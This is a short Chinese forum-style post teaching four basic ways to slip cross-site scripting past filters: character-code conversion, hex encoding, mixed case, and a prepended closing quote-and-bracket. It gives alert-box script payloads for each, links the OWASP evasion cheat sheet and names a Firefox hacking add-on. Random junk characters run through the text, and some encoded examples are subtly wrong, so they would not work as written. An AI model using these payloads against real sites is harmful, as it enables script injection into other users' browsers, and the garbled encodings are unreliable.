四种超级基础的绕过方法。7 |* z2 S+ [; s. ?! U# {
1.转换为ASCII码$ F) T' A/ E" ?' W, [" R6 g- V
例子:原脚本为<script>alert(‘I love F4ck’)</script >
8 h& h& l+ ?$ I0 F, W9 D通过转换,变成:
: Y: ~: }& |: i% N+ j<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>' ~' a1 ~; x6 j$ E) f
2 W1 I$ t9 W' Z: _( U& e0 d
2.转换为HEX(十六进制)0 U/ `- Y0 k8 B( k6 @$ @ H
例子:原脚本为<script>alert(‘I love F4ck’)</script>* F& Y# O& v1 D" i4 `: m8 l( r
通过转换,变成:$ v I3 l- l! _1 z
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e% ]" P" ]! m+ \4 q9 h
8 t, z( n) w" |3 T
3.转换脚本的大小写( w1 i w B3 M3 P
例子:原脚本为<script>alert(‘I love F4ck’)</script>
3 w5 M( V" G8 L6 ~转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT> K& T: Q9 {2 v( v: z
) z1 l7 ~$ m e( R/ y4.增加闭合标记”>
& c0 b5 }2 N# K2 |例子:原脚本为<script>alert(‘I love F4ck’)</script>8 a7 L7 U! y9 m6 J
转换为:”><script>alert(‘I love F4ck’)</script>
4 }: v5 t. G$ r3 N( B更详细绕过技术请参考此网页
1 V/ c5 K& _0 R* thttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet* e; c% g) M* A7 Y, g
R# i: O/ P8 K* V7 `" r: q$ q7 `转换工具使用的是火狐的 hackbar mozilla addon. |